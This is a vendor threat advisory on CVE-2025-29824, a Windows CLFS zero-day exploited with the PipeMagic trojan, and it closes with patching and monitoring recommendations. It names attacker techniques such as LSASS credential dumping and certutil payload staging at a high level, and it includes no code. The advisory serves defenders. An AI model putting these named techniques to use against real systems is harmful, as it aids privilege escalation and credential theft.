A newly discovered Windows zero-day vulnerability, CVE-2025-29824, is actively exploited by a targeted ransomware campaign involving the PipeMagic trojan. Continue reading this Cybersecurity Threat Advisory to limit the impact of this vulnerability.
What is the threat?
CVE-2025-29824 is critical flaw in the Windows Common Log File System (CLFS) that enables attackers to escalate privileges to SYSTEM-level access, allowing them to deploy ransomware and gain full control of compromised systems. Following the initial compromise, attackers can deploy ransomware payloads involving the PipeMagic trojan. Microsoft has attributed the activity to a threat group that tracks as Storm-2460.
Why is it noteworthy?
This vulnerability is particularly significant because it is actively exploited in real-world attacks. The attacks have targeted a range of industries globally, including IT and real estate in the U.S., banks in Venezuela, software companies in Spain, and retail businesses in Saudi Arabia. The attackers used PipeMagic, a modular trojan that facilitates privilege escalation, similar to malware seen in previous attacks such as Nokoyawa and RansomEXX. By exploiting the RtlSetAllBits function, they manipulated security settings to gain full control of affected systems. Although investigators have not identified an actual ransomware payload, they found ransom notes on TOR websites that link back to RansomEXX, suggesting the group’s involvement.
What is the exposure or risk?
Systems that have not applied the latest Windows security updates remain vulnerable to CVE-2025-29824, allowing attackers to escalate privileges to SYSTEM or root level. Exploitation can lead to severe consequences, such as data exfiltration, credential theft via LSASS memory dumps, and file encryption, all of which can result in significant operational disruption and data loss. The attackers have used MSBuild scripts and certutil-based payload staging techniques to evade traditional security detection. It’s also important to note that Windows 11 version 24H2 is not affected, as it contains improvements in system information access permissions mitigate the risk.
What are the recommendations?
Barracuda recommends the following actions to limit the impact of this vulnerability:
- Apply the latest updates from Microsoft which addresses CVE-2025-29824.
- Monitor for suspicious activity involving MSBuild, certutil, or NtQuerySystemInformation APIs.
- Follow the principle of least privilege across user accounts and processes.
- Limit or monitor the use of built-in tools often abused by attackers, such as PowerShell, WMI, and Task Scheduler.
- Maintain secure, offline backups and regularly verify their integrity.
- Educate employees about phishing and common methods of malware delivery.
References
For more in-depth information about the recommendations, please visit the following links:
- https://thehackernews.com/2025/04/pipemagic-trojan-exploits-windows-clfs.html
- https://nvd.nist.gov/vuln/detail/CVE-2025-29824
If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.
This post originally appeared on Smarter MSP.